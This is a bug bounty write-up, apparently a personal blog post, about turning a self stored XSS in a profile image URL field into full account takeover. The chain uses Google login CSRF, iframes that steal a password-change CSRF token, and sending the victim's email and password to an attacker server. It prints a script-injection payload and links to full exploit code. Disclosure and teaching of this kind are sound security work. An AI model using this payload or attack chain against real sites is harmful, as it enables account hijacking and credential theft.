Today I will share you my recent finding which was a self xss but I turned it into a full account takeover using various other misconfigurations and features already available on the website.
EXPLOITATION SCENARIO :
- Self stored xss
- Google login csrf to good xss
- Logout of attacker account
- Using previous google login to get into victim account
- Stealing password change csrf token
- Changing the password
- Sending email+password to the server
So this was a private program so every thing will be redacted. During my testing I found a simple stored xss which was in the profile upload functionality. The functionality was like this, whenever I uploaded an image from my local drive, first the website uploads it to an other server, and in the next request it stores the url of that image stored on other server to the current website. I placed a simple “><script>alert(1)</script> in that url something like this &imageurl=https://example.com“><script>alert(1)</script> and the alert box popped up each time I visited my profile. But this was only a self xss. I needed to make it execute at the victim side.
So after this I shown a scenario in the report where an attacker can make a user visit the website and with the help of xss do some social engineering to steal his data as the url in the browser was of the same website, it makes attack more believable. The exploit was appreciated by the h1 triager, but he wanted me to execute xss on the victim account for a good impact. And I will say the triager somehow motivated me through his words and I thank him for that 💙
So the next task for me was to somehow login to the victim account and execute the xss. A quick recap :
- Self xss on profile page
- Csrf to login in attacker account using google login token to good xss
Now my curiosity said that what if the victim is already using his google account on the site , cant we use that account to pop xss on victim? Yeah definitely and then I did some research about this topic and I knew this writeup which I read before https://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/ from @emgeekboy and this helped me to move forward a lot.
Now I needed to get some more things for the next steps and those were :
- There was a different csrf token for password change as well and it was only on the settings page source code. I needed it in order to perform password change.
- Settings page for an user was like this https://example.com/user/setting so I needed the username as well to go to that page and steal csrf token
In this way I was able to completely takeover an account using a simple self stored xss.
You can read the full exploit code here https://gist.github.com/yourbuddy25/75080f317a464ca8a46acd8e5b5f8be6. The full exploit takes atleast 1 minute to fully takeover an account due to timeouts set on the iframes to load them properly.
MAIN TAKEAWAYS :
- Always try to escalate a xss, like stealing some personal information through local session storage, account takeovers,privilege escalation or a normal phishing scenario.
I am also activley looking for any penetration testing, or any other appsec engineer position. If any recruiter reading this, they can contact me below.
TWITTER : https://twitter.com/techyfreakk
Thanks for reading :)